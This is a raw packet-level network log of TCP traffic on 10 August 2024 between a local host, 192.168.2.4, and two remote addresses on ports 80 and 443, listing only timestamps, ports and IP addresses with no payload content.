Aug 10, 2024 16:12:23.185374022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185374022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185383081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185419083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185419083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185465097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185476065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185486078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185544968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185544968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185607910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185619116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185628891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185638905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185671091 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185714960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185847998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185858965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185868979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185880899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185920000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185920954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185920954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185933113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185964108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186023951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186050892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186063051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186142921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186153889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186163902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186180115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186186075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186186075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186187029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186191082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186234951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186235905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186310053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186408043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186419010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186429977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186443090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186448097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186455965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186461926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186467886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186506033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186506033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186646938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186666965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186815023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186825991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186836004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186847925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186860085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186871052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186882973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186893940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186893940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186893940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186894894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186906099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186918020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186928988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.186964035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186964035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186964035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.186964035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187060118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187191010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187201977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187259912 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187478065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187499046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187510014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187522888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187535048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187551975 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187602997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187602997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187618971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187629938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187642097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187653065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187659025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187664032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187674046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187676907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187676907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187685966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187700033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187721968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187807083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.187987089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.187998056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188009024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188020945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188030958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188043118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188054085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188065052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188076019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188087940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188107014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188107014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188107014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188147068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188605070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188640118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188652992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188659906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188671112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188680887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188693047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188704014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188714981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188725948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188731909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188731909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188735962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188747883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188757896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188766956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188767910 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188769102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188780069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188791990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188791990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188802958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188815117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188827038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188838959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188851118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.188875914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188877106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188877106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188877106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.188905001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189521074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189532995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189543962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189553976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189564943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189575911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189582109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189593077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189594030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189594030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189604044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189615011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189621925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189625978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189635992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189647913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189650059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189660072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189662933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189671993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189713955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189718008 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189718008 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189726114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.189769030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.189769030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.234352112 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.234409094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.234477997 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.234549999 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.234549999 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.234549999 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.234572887 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.234639883 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.234663963 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.234699011 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.235572100 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.235779047 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.235785007 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.235850096 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.236620903 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.236788988 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.237672091 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.237737894 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.289808989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290005922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290014982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290024996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290035009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290045023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290054083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290112972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290112972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290486097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290503979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290514946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290524960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290537119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290546894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290549994 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290558100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290569067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290575981 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290580034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290636063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290636063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290664911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290694952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290705919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290715933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290725946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290736914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290749073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.290750980 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290751934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290751934 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290783882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.290793896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.291078091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291088104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291098118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291109085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291120052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291131020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291141987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291145086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.291145086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.291155100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291171074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.291205883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.291604042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291614056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291624069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291634083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291644096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.291682005 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.291682005 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.291693926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292072058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292083979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292093039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292103052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292113066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292123079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292134047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292143106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292154074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292165041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292175055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292176962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292176962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292176962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292186975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292190075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292196989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292208910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292210102 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292231083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292268991 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292424917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292440891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292452097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292462111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292473078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292473078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292501926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292538881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292540073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292550087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292560101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292571068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292581081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292593002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292603970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292613983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292629957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292640924 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.292660952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292660952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292660952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292660952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.292746067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293410063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293420076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293431044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293440104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293450117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293459892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293469906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293479919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293499947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293513060 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293513060 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293513060 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293513060 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293524027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293533087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293544054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293554068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293565989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293567896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293567896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293576956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293587923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293598890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.293647051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293647051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.293647051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294321060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294332027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294341087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294352055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294361115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294370890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294374943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294380903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294390917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294401884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294410944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294411898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294423103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294433117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294441938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294452906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294461012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294461012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294461012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294462919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294473886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294485092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294495106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.294548035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294548035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.294548035 CEST	49740	80	192.168.2.4	147.45.44.104
